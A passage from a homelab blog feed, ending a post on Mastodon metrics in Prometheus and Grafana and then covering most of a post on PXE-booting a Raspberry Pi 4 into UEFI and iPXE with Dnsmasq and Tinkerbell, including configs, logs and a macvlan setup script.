</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">major_gc_ops_total</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">minor_gc_ops_total</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">allocated_objects_total</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">sidekiq_job_duration_seconds.*</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">active_record_connection_pool.*</span>
</span></span></code></pre></div><p>Nothing really special about it, besides perhaps dropping a couple of metrics
I did not find too interesting at ingestion.</p>
<p>One note: If you&rsquo;ve got network policies in use, make sure that your Prometheus
instance can actually reach the Mastodon Pods.</p>
<p>Next I went to my Grafana instance and created a few panels in a fresh dashboard
to show the interesting data. I created a couple of stats panels first:</p>
<figure>
    <img loading="lazy" src="stats.png"
         alt="A screenshot of multiple Grafana stats panels. The first one is for &#39;Dead Jobs&#39;, showing that right now, there are 1196 of them. Next come the failed jobs, with 57k jobs and then the big one, 3.55 million processed jobs. That&#39;s followed by the retry queue with 96 entries and the scheduled queue, with 54 entries."/> <figcaption>
            <p>The overview stats panels in my Mastodon dashboard.</p>
        </figcaption>
</figure>

<p>Then I&rsquo;ve also got two time series panels, starting with the total jobs by type:
<figure>
    <img loading="lazy" src="total-jobs.png"
         alt="A screenshot of a Grafana time series panel, showing six hours from 16:00 to 22:00. The legend shows a number of different job types from Mastodon&#39;s system, like the FetchReplyWorker or the RefollowWorker. The plot is stacked, and hovers around 100 jobs on average. But around 16:50, 19:10, 20:28, 20:40, 21:00, 21:45, 22:00, there are peaks up to 300 to 500 jobs, driven by the ActivityPub:DeliveryWorker."/> <figcaption>
            <p>The current jobs running.</p>
        </figcaption>
</figure>

This plot shows the increase in jobs in the given period. It nicely shows the
times where I made a post or boosted a post today. So this plot alone was already
worth it. &#x1f642;</p>
<p>Next, I&rsquo;ve also got a plot for the failed jobs:
<figure>
    <img loading="lazy" src="failed-jobs.png"
         alt="A screenshot of a Grafana time series panel, showing the failed jobs by type. It shows none for a lot of the time, but again, whenever I post or boost something, around the same times as the previous plot, the failed jobs shoot up, albeit only to around 22."/> <figcaption>
            <p>Failed jobs during the same time frame.</p>
        </figcaption>
</figure>
</p>
<p>I would have wished for a bit more info, to be honest. At least the general
instance information available in Mastodon&rsquo;s admin dashboard would have been nice.</p>
<p>But this is enough for now, and it&rsquo;s going to be interesting to see how the
daily jobs develop in the future.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Tinkerbell Part IV: Provisioning a Raspberry Pi 4</title>
      <link>https://blog.mei-home.net/posts/tinkerbell-4-provisioning-pi4/</link>
      <pubDate>Sun, 29 Jun 2025 17:20:54 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/tinkerbell-4-provisioning-pi4/</guid>
      <description>I configure Tinkerbell and Dnsmasq to provisioning a Pi 4 with an USB SSD</description>
      <content:encoded><![CDATA[<p>In this post, I will show how I provisioned a Raspberry Pi 4 with an attached
USB SSD via Tinkerbell.</p>
<p>This is part 4 of my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">Tinkerbell series</a>.</p>
<p>The main goal of this post is to get this little guy to boot into Tinkerbell&rsquo;s
<a href="https://tinkerbell.org/docs/additionalcomponents/hookos/">HookOS</a> and install
an Ubuntu 24.04 Raspberry Pi image onto the SSD:</p>
<figure>
    <img loading="lazy" src="the-pi.jpg"
         alt="A picture of a desk with a Raspberry Pi 4 board and accessories. The Pi 4 is clad in a passive red heat sink and mounted on a right-angle piece of metal. It&#39;s connected to a small 7 inch screen with an HDMI and an USB cable. Furthermore, it&#39;s also connected to a keyboard and has a network cable plugged in. Finally, it&#39;s also connected to a 2.5 inch Kingston SATA SSD via a USB-to-SATA adapter."/> <figcaption>
            <p>My experimental setup.</p>
        </figcaption>
</figure>

<p>To get the Ubuntu image onto the SSD and have the Pi boot from it, the following
steps need to be executed:</p>
<ol>
<li>Boot the Pi into an UEFI firmware via the Pi&rsquo;s weird PXE boot procedure</li>
<li>From the UEFI firmware, boot into iPXE, again via PXE boot</li>
<li>Fetch the iPXE script to execute HookOS from Tinkerbell. Again, you guessed
it, via PXE</li>
<li>Finally, boot HookOS itself</li>
</ol>
<h2 id="raspberry-pi-pxe-boot-to-uefi">Raspberry Pi PXE boot to UEFI</h2>
<p>To understand the rest of this post, let&rsquo;s start with a quick look at the
Raspberry Pi&rsquo;s netboot process. It all starts with a DHCP request. The direct
reply to that request might already contain a TFTP server address. If it doesn&rsquo;t,
the Pi&rsquo;s firmware will also wait for a Proxy DHCP reply. With this configuration,
it&rsquo;s possible to split the normal DHCP server doing IP address management and the
DHCP server which supplies PXE boot parameters.</p>
<p>When a TFTP server address is indeed received, the Pi starts to download files
from it. The boot file option that can also be supplied for PXE is not supported
by the Pi netboot process. It doesn&rsquo;t matter what that option is set to, and
whether it&rsquo;s send in the DHCP reply or not. It&rsquo;s just ignored. The initial file
being downloaded is the <code>config.txt</code> file. It contains configuration for the
firmware. Relevant to the boot process are the options for the <a href="https://www.raspberrypi.com/documentation/computers/config_txt.html#kernel">kernel</a> and
<a href="https://www.raspberrypi.com/documentation/computers/config_txt.html#initramfs">initramfs</a>
as well as, in this particular case, the <a href="https://www.raspberrypi.com/documentation/computers/legacy_config_txt.html#armstub">armstub</a>
option. The <code>armstub</code> tells the boot firmware - which runs on the GPU, on this
SoC - what to load up on the ARM CPU cores after the initial boot. By default,
that&rsquo;s just looking to load the <code>kernel</code> and <code>initramfs</code> during a normal boot,
leading to Linux being started. But when the <code>armstub</code> is set, the given file
is loaded instead. In all three cases, the files given are loaded from the
TFTP server when netbooting.</p>
<p>To load the Pi in UEFI mode, I&rsquo;ve been using <a href="https://github.com/rgl/rpi4-uefi-ipxe">this repository</a>.
Initially, I thought I needed this &ldquo;special&rdquo; firmware to get iPXE running, but
it turns out that the <a href="https://ipxe.org/">iPXE project</a> already provides the
<code>snp.efi</code> file, which is compatible with a Pi 4 booted into UEFI.</p>
<p>So for now, the goal is to get the Pi booted into the UEFI stub.</p>
<h2 id="dnsmasq-server-setup">Dnsmasq server setup</h2>
<p>To supply all of these files via TFTP, I needed a TFTP server. While
Tinkerbell does provide TFTP capabilities, those are very rudimentary and only
intended to provide the iPXE binary for PXE booting hosts, and nothing more.</p>
<p>As I&rsquo;ve already got a Dnsmasq instance running in my Homelab, for my regular
netbooters, I decided to use it here as well. And that was quite a ride in
and of itself, because of the way Kubernetes networking and DHCP work.</p>
<p>I set Dnsmasq up on my k3s test cluster running on a VM. I could not make the
Pod use host networking, because Tinkerbell, which also needed to listen on
port 67 for DHCP, was already running on the same host. So I decided to use
the same trick that Tinkerbell uses, a <code>macvlan</code> type interface. This type of
Linux interface is attached to a real physical interface, but gets a different
MAC, so it&rsquo;s basically a completely separate interface. The rest of the network
just knows that there&rsquo;s now two MAC addresses behind the given switch port instead
of just one. Tinkerbell has the same approach, see <a href="https://github.com/tinkerbell/tinkerbell/blob/main/helm/tinkerbell/templates/host-interface-config-map.yaml">here</a>.</p>
<p>This script creates an additional interface, which piggy-backs off of the physical
interface to make it possible for a Pod to receive and send broadcast packets.
With just the VIP created by <a href="https://kube-vip.io/">kube-vip</a> for LoadBalancer
services, broadcast packets are just not forwarded to the Pod, and Dnsmasq never
sees them. This is problematic, as the initial DHCP discover packets are send
as broadcast, as the host hasn&rsquo;t been configured yet and doesn&rsquo;t know about the
DHCP server in the subnet.</p>
<p>After configuring the macvlan interface, I tried this Dnsmasq configuration:</p>
<pre tabindex="0"><code>port=0
dhcp-range=203.0.113.255,proxy
log-dhcp
enable-tftp
tftp-root=/tftp-files
pxe-service=0,&#34;Raspberry Pi Boot&#34;,203.0.113.17
</code></pre><p>Together with the manually created macvlan interface, Dnsmasq was able to
receive the broadcast packets - but it wasn&rsquo;t able to answer them. Instead, I
got this line in the logs:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[18135]: no address range available for DHCP request via macvlandnsm
</code></pre><p>After some digging, I figured out that the issue was that Dnsmasq uses the subnet
of the interface where a DHCP request arrives to determine which <code>dhcp-range</code>
parameter to use for the answer. And in this case, the <code>macvlandnsm</code> interface
gets the hardcoded <code>127.1.1.1</code> IP in the script. So I changed the <code>dhcp-range</code>
parameter like this:</p>
<pre tabindex="0"><code>dhcp-range=127.1.1.255,proxy
</code></pre><p>And this &ldquo;worked&rdquo;:</p>
<pre tabindex="0"><code>dnsmasq[2837]: started, version 2.91 DNS disabled
dnsmasq[2837]: compile time options: IPv6 GNU-getopt no-DBus no-UBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset no-nftset auth no-DNSSEC loop-detect inotify dumpfile
dnsmasq-dhcp[2837]: DHCP, proxy on subnet 127.1.1.255
dnsmasq-tftp[2837]: TFTP root is /tftp-files
dnsmasq-dhcp[2837]: 2783272004 available DHCP subnet: 127.1.1.255/255.0.0.0
dnsmasq-dhcp[2837]: 2783272004 vendor class: PXEClient:Arch:00000:UNDI:002001
dnsmasq-dhcp[2837]: 2783272004 PXE(macvlandnsm) e4:5f:01:bc:f4:ce proxy
dnsmasq-dhcp[2837]: 2783272004 tags: macvlandnsm
dnsmasq-dhcp[2837]: 2783272004 broadcast response
dnsmasq-dhcp[2837]: 2783272004 sent size:  1 option: 53 message-type  2
dnsmasq-dhcp[2837]: 2783272004 sent size:  4 option: 54 server-identifier  127.1.1.1
dnsmasq-dhcp[2837]: 2783272004 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
dnsmasq-dhcp[2837]: 2783272004 sent size: 17 option: 97 client-machine-id  00:34:69:50:52:15:31:c0:00:01:bc:f4:ce:cb...
dnsmasq-dhcp[2837]: 2783272004 sent size: 41 option: 43 vendor-encap  06:01:03:0a:04:00:50:58:45:08:07:80:00:01...
dnsmasq-dhcp[2837]: 2783272004 available DHCP subnet: 127.1.1.255/255.0.0.0
dnsmasq-dhcp[2837]: 2783272004 vendor class: PXEClient:Arch:00000:UNDI:002001
</code></pre><p>So Dnsmasq did receive the DHCP request, and it also answered to it. But
have a closer look at this line:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[2837]: 2783272004 sent size:  4 option: 54 server-identifier  127.1.1.1
</code></pre><p>Note the <code>127.1.1.1</code> IP returned by Dnsmasq to the netbooting Pi. That&rsquo;s what
the Pi uses as the TFTP server. And of course, that address is from the loopback
range, and hence isn&rsquo;t accessible for the Pi at all.</p>
<p>After some additional tinkering and testing, I came up with the solution to just
assign the <code>macvlandnsm</code> interface a routable IP, and also assigned the IP as
<code>/24</code> instead of <code>/32</code>. Then I reset the <code>dhcp-range</code> option to contain the
actual subnet:</p>
<pre tabindex="0"><code>dhcp-range=203.0.113.255,proxy
</code></pre><p>With these changes, the Pi was then able to boot into UEFI:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[20493]: 2783272890 available DHCP subnet: 203.0.113.255/255.255.255.0
dnsmasq-dhcp[20493]: 2783272890 vendor class: PXEClient:Arch:00000:UNDI:002001
dnsmasq-dhcp[20493]: 2783272890 PXE(macvlandnsm) e4:5f:01:bc:f4:ce proxy
dnsmasq-dhcp[20493]: 2783272890 tags: macvlandnsm
dnsmasq-dhcp[20493]: 2783272890 broadcast response
dnsmasq-dhcp[20493]: 2783272890 sent size:  1 option: 53 message-type  2
dnsmasq-dhcp[20493]: 2783272890 sent size:  4 option: 54 server-identifier  203.0.113.18
dnsmasq-dhcp[20493]: 2783272890 sent size:  9 option: 60 vendor-class  50:58:45:43:6c:69:65:6e:74
dnsmasq-dhcp[20493]: 2783272890 sent size: 17 option: 97 client-machine-id  00:34:69:50:52:15:31:c0:00:01:bc:f4:ce:cb...
dnsmasq-dhcp[20493]: 2783272890 sent size: 41 option: 43 vendor-encap  06:01:03:0a:04:00:50:58:45:08:07:80:00:01...
dnsmasq-dhcp[20493]: 2783272890 available DHCP subnet: 203.0.113.255/255.255.255.0
dnsmasq-dhcp[20493]: 2783272890 vendor class: PXEClient:Arch:00000:UNDI:002001
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/start4.elf to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/fixup4.dat to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/bcm2711-rpi-4-b.dtb to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/config.txt to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/overlays/miniuart-bt.dtbo to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/overlays/upstream-pi4.dtbo to 203.0.113.70
dnsmasq-tftp[20493]: sent /tftp-files/RPI_EFI.fd to 203.0.113.70
</code></pre><p>I have removed a number of lines from the log output where the Pi aborted the
transmission. This approach is used to check whether a certain file is present
on the TFTP server to decide what to download next.</p>
<p>To provide the files in the <code>/tftp-files</code> directory in the Dnsmasq Pod, I used
<a href="https://github.com/rgl/rpi4-uefi-ipxe/releases/tag/v0.11.0">this release</a>. I
took the <code>rpi4-uefi-ipxe.zip</code> file and unpacked it all in the <code>/tftp-files</code>
dir, to which I had mounted a PersistentVolume.</p>
<p>I&rsquo;ve also simplified Tinkerbell&rsquo;s manual interface setup script a bit to use
it with Dnsmasq. It now looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env sh
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Script taken from Tinkerbell: https://raw.githubusercontent.com/tinkerbell/tinkerbell/refs/heads/main/helm/tinkerbell/templates/host-interface-config-map.yaml</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This script allows us to listen and respond to DHCP requests on a host network interface and interact with Dnsmasq.</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>set -xeuo pipefail
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> usage<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Usage: </span>$0<span style="color:#e6db74"> [OPTION]...&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Init script for setting up a network interface to listen and respond to DHCP requests from the Host and move it into a container.&#34;</span>
</span></span><span style="display:flex;"><span>    echo
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Options:&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -s, --src     Source interface for listening and responding to DHCP requests (default: default gateway interface)&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -t, --type    Create the interface of type, must be either ipvlan or macvlan (default: macvlan)&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -c, --clean   Clean up any interfaces created&#34;</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;  -h, --help    Display this help and exit&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> binary_exists<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    command -v <span style="color:#e6db74">&#34;</span>$1<span style="color:#e6db74">&#34;</span> &gt;/dev/null 2&gt;&amp;<span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> main<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    local src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$1<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    local interface_type<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    local interface_mode<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$3<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    local interface_name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;macvlandnsm&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Preparation</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the container</span>
</span></span><span style="display:flex;"><span>    ip link del <span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the host namespace</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link del <span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Create the interface</span>
</span></span><span style="display:flex;"><span>    echo  <span style="color:#e6db74">&#34;Creating interface </span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74"> of type </span><span style="color:#e6db74">${</span>interface_type<span style="color:#e6db74">}</span><span style="color:#e6db74"> with mode </span><span style="color:#e6db74">${</span>interface_mode<span style="color:#e6db74">}</span><span style="color:#e6db74"> linked to </span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link add <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> link <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> type <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_type<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> mode <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_mode<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Move the interface into the Pod container</span>
</span></span><span style="display:flex;"><span>    pid<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo $$<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Moving interface </span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74"> into container with PID </span><span style="color:#e6db74">${</span>pid<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link set <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> netns <span style="color:#e6db74">${</span>pid<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> nsenter -t1 -n ip link delete <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Bring up the interface</span>
</span></span><span style="display:flex;"><span>    ip link set dev <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> up
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Set the IP address</span>
</span></span><span style="display:flex;"><span>    ip addr add 203.0.113.18/24 dev <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_name<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> noprefixroute <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>interface_type<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;macvlan&#34;</span>
</span></span><span style="display:flex;"><span>interface_mode<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>clean<span style="color:#f92672">=</span>false
</span></span><span style="display:flex;"><span><span style="color:#75715e"># s: means -s requires an argument</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># s:: means -s has an optional argument</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># s (without colon) means -s doesn&#39;t accept arguments</span>
</span></span><span style="display:flex;"><span>args<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>getopt -a -o s::ch --long src::,clean,help -- <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> $? -gt <span style="color:#ae81ff">0</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>usage
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>eval set -- <span style="color:#e6db74">${</span>args<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">while</span> :
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">case</span> $1 in
</span></span><span style="display:flex;"><span>    -s | --src<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#75715e"># If $2 starts with &#39;-&#39; or is empty (--), it&#39;s not a value but another option</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;--&#34;</span> <span style="color:#f92672">||</span> <span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> -* <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>          src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>          shift
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>          src_interface<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$2<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>          shift <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>      ;;
</span></span><span style="display:flex;"><span>    -c | --clean<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      clean<span style="color:#f92672">=</span>true
</span></span><span style="display:flex;"><span>      shift ;;
</span></span><span style="display:flex;"><span>    -h | --help<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span>      usage
</span></span><span style="display:flex;"><span>      exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      shift ;;
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># -- means the end of the arguments; drop this, and break out of the while loop</span>
</span></span><span style="display:flex;"><span>    --<span style="color:#f92672">)</span> shift; break ;;
</span></span><span style="display:flex;"><span>    *<span style="color:#f92672">)</span> &gt;&amp;<span style="color:#ae81ff">2</span> echo Unsupported option: $1
</span></span><span style="display:flex;"><span>      usage ;;
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">esac</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    src_interface<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>nsenter -t1 -n ip route | awk <span style="color:#e6db74">&#39;/default/ {print $5}&#39;</span> | head -n1<span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>clean<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the container</span>
</span></span><span style="display:flex;"><span>    ip link del macvlandnsm <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Delete existing interfaces in the host namespace</span>
</span></span><span style="display:flex;"><span>    nsenter -t1 -n ip link del macvlandnsm <span style="color:#f92672">||</span> true
</span></span><span style="display:flex;"><span>    exit <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>main <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>src_interface<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_type<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>interface_mode<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span></code></pre></div><p>Here is the current state of the boot:</p>
<figure>
    <img loading="lazy" src="uefi-boot.jpg"
         alt="A picture of a screen showing the Pi booted into the UEFI firmware. In the background, it shows the Raspberry Pi raspberry. At the bottom, several shortcuts are shown to enter setup, the shell or continue booting. At the top, text showing an attempt to do a PXE boot via IPv4 and IPv6 is displayed. In both cases, the remote boot failed."/> <figcaption>
            <p>The Pi successfully boots into the UEFI firmware.</p>
        </figcaption>
</figure>

<h2 id="getting-the-pi-to-execute-tinkerbells-ipxe-script">Getting the Pi to execute Tinkerbell&rsquo;s iPXE script</h2>
<p>It was very convenient to see that the UEFI firmware also attempts a PXE boot.
This allowed me to continue with pointing this stage of the boot to Tinkerbell&rsquo;s
iPXE binaries. For the most part, these are standard iPXE binary builds. The
only difference is that Tinkerbell introduced a user class setting to the PXE
requests the iPXE boot program will send, to make those requests easier to work
with.</p>
<p>Instructing the UEFI firmware to fetch the iPXE binary from Tinkerbell only needed
one additional setting in Dnsmasq:</p>
<pre tabindex="0"><code>pxe-service=ARM64_EFI,&#34;EFI Netboot&#34;,snp.efi,203.0.113.200
</code></pre><p>This line sets the boot file to <code>snp.efi</code> and instructs the iPXE firmware to
fetch it from Tinkerbell, not Dnsmasq. This is what the exchange looks like:</p>
<pre tabindex="0"><code>dnsmasq-dhcp[3309]: 3924602938 available DHCP subnet: 203.0.113.255/255.255.255.0
dnsmasq-dhcp[3309]: 3924602938 vendor class: PXEClient:Arch:00011:UNDI:003000
dnsmasq-dhcp[3309]: 3924602938 PXE(macvlandnsm) e4:5f:01:bc:f4:ce proxy
dnsmasq-dhcp[3309]: 3924602938 tags: macvlandnsm
dnsmasq-dhcp[3309]: 3924602938 bootfile name: snp.efi
dnsmasq-dhcp[3309]: 3924602938 server name: 203.0.113.200
dnsmasq-dhcp[3309]: 3924602938 next server: 203.0.113.200
